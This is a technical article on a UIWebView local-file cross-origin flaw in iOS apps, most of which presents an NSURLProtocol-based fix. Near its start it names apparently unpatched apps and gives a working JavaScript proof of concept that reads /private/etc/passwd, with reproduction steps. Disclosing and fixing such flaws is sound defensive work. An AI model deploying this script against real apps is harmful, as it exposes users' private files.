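iOS developers use UIWebView all the time, mostly to load remote URLs, but sometimes also to load local HTML files.
When UIWebView loads a remote URL it follows the same-origin policy, but when it loads a local page it bypasses the same-origin policy, which makes it possible to access arbitrary paths on the system.
This is the UXSS vulnerability in UIWebView. Apps known not to have fixed it yet: Weipan (微盘), 文件全能王, QQ Reader (QQ阅读).
The vulnerability is reproduced in much the same way in each app; Weipan is used as the example here:
On a PC, create a web page named test.html with the following content: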
<script>
alert(document.location);
var aim='file:///private/etc/passwd';
var d=document;
function doAttack()
{
    var xhr1= new XMLHttpRequest();
    xhr1.overrideMimeType('text/plain; charset=iso-8859-1');
    xhr1.open('GET',aim);
    xhr1.onreadystatechange = function()
    {
        if(xhr1.readyState ==4)
        {
            var txt=xhr1.responseText;
            alert(txt);
        }
    };
    xhr1.send();
}
doAttack();
</script>
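Send the file to WeChat on the phone. In WeChat on the phone, tap the file that was just sent over, choose to open it with another app, and pick "Weipan" from the app list that pops up. This brings up the Weipan screen; tap the upload button. Once the upload has finished, tap the newly uploaded file in the My Weipan file list. An alert box pops up showing the path of the current file; tap "OK" and the system account and password information (that is, the contents of the passwd file) is then displayed.
[Screenshot of the result]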
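Fixes
<1> Disable opening HTML files from outside the app; (cuts off the attack entry point)
<2> Apply some permission restrictions to scripts in local HTML files; (a preliminary precaution)
<3> Add an NSURLProtocol dedicated to loading local web pages, so that local files are loaded safely according to the same-origin policy. (the thorough solution)
The first two options are relatively simple and are not covered here.
This article focuses on the third option:
On iOS, every protocol (http, https, ftp, file) is handled through NSURLProtocol,
and each one has its own NSURLProtocol. The important methods are: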
+ (BOOL)registerClass:(Class)protocolClass
Registers an NSURLProtocol;
+ (void)unregisterClass:(Class)protocolClass
Unregisters an NSURLProtocol
+ (BOOL)canInitWithRequest:(NSURLRequest *)request
Indicates whether the request goes through this NSURLProtocol's handling logic: YES means it does, NO means it does not;
- (void)startLoading
Starts loading the request. The system calls this method; we only need to perform the network data request inside it
- (void)stopLoading
Stops loading the request. The system calls this method; we only need to do some request cancellation inside it
We create a new class derived from NSURLProtocol, named SeMobSandBoxFileProtocol for now.
In the AppDelegate callback application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions, call
[NSURLProtocol registerClass:[SeMobSandBoxFileProtocol class]]; // register our protocol
The contents of SeMobSandBoxFileProtocol.h and SeMobSandBoxFileProtocol.m are as follows:
// SeMobSandBoxFileProtocol.h
#import <Foundation/Foundation.h>
@interface SeMobSandBoxFileProtocol : NSURLProtocol
@end

// SeMobSandBoxFileProtocol.m
#import "SeMobSandBoxFileProtocol.h"
@implementation SeMobSandBoxFileProtocol
// Schemes this protocol inspects
+ (NSArray *)supportedScheme
{
    return [NSArray arrayWithObjects:@"file", nil];
}
// Returning YES claims the request; startLoading then fails it, so YES means "block"
+ (BOOL)canInitWithRequest:(NSURLRequest *)request
{
    NSURL* url=[request URL];
    NSUInteger index = [[self supportedScheme] indexOfObject:[url scheme]];
    if (index!=NSNotFound)
    {
        NSURL* baseURL=[[request mainDocumentURL] URLByDeletingLastPathComponent];
        NSString* baseString=[[baseURL absoluteString] lowercaseString]; // path of the main resource's directory
        NSRange sharpRange=[baseString rangeOfString:@"#"];
        if (sharpRange.length) {
            baseString=[baseString substringToIndex:sharpRange.location]; // filter the path: drop the # and everything after it
        }
        if([baseURL isFileURL]) {
            // block when the subresource path does not start with the main resource's directory prefix
            BOOL ok=![[[url absoluteString] lowercaseString] hasPrefix:baseString];
            return ok;
        }
        else
        {
            // main document is not a file URL: block the file request whenever a main document exists
            return baseString.length>0;
        }
    }
    return NO;
}
// Nothing to cancel: startLoading fails the request immediately
- (void)stopLoading
{
}
// Every request claimed by canInitWithRequest: is failed here
-(void)startLoading
{
    [[self client] URLProtocol:self didFailWithError:[NSError errorWithDomain:@"CFNetwork" code:kCFURLErrorUnknown userInfo:@{@"NSErrorFailingURLKey":self.request.URL}]];
}
+ (NSURLRequest *)canonicalRequestForRequest:(NSURLRequest *)request {
    return request;
}
@end
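Code analysis
The overall idea is to use the file paths of the main resource and the subresource to decide whether they are in a parent/child directory relationship: if they are, access to the subresource is allowed, otherwise it is not. This stops a subresource from reaching directories outside the main resource's directory. Because the parent/child relationship is decided by checking whether the path contains the directory prefix, the path has to be filtered first, removing everything after the # in the path together with the # itself.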
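The same parent/child directory check written over normalized paths, as an added example that is not the original article's code: it collapses ".." segments and resolves symlinks before comparing, and reads the path through -path, which carries no # fragment. The helper name SeMobIsInsideMainDocumentDirectory and the sample URLs (including the APPID placeholder) are assumptions made for this illustration.

```objc
#import <Foundation/Foundation.h>

// Hypothetical helper, not part of the article's class: YES only when
// `resource` is a file inside the directory that holds `mainDocument`.
static BOOL SeMobIsInsideMainDocumentDirectory(NSURL *resource, NSURL *mainDocument)
{
    if (![resource isFileURL] || ![mainDocument isFileURL]) {
        return NO;
    }
    // -path carries no "#fragment" or "?query", so no manual stripping is needed.
    // Standardizing collapses "." and ".."; resolving symlinks keeps a link
    // stored inside the directory from pointing outside it.
    NSString *base = [[[[mainDocument URLByDeletingLastPathComponent]
        URLByStandardizingPath] URLByResolvingSymlinksInPath] path];
    NSString *target = [[[resource URLByStandardizingPath]
        URLByResolvingSymlinksInPath] path];
    if (base.length == 0 || target.length == 0) {
        return NO;
    }
    // Compare against "base/" so "/Documents" never matches "/Documents-other".
    if (![base hasSuffix:@"/"]) {
        base = [base stringByAppendingString:@"/"];
    }
    return [target hasPrefix:base];
}

int main(void)
{
    @autoreleasepool {
        // Constructed sample URLs; APPID is a placeholder, not a real container id.
        NSString *docs = @"file:///var/mobile/Containers/Data/Application/APPID/Documents/";
        NSURL *mainDoc = [NSURL URLWithString:[docs stringByAppendingString:@"test.html#top"]];
        NSArray<NSString *> *samples = @[
            [docs stringByAppendingString:@"img/logo.png"],       // below the main document
            [docs stringByAppendingString:@"../Library/example.dat"], // climbs out with ".."
            @"file:///private/etc/passwd",                        // path used in the article
        ];
        for (NSString *s in samples) {
            NSURL *u = [NSURL URLWithString:s];
            NSLog(@"%@ -> %@", s,
                  SeMobIsInsideMainDocumentDirectory(u, mainDoc) ? @"allow" : @"block");
        }
    }
    return 0;
}
```

In canInitWithRequest:, the file-URL branch could return the negation of this helper in place of the lowercased hasPrefix: comparison.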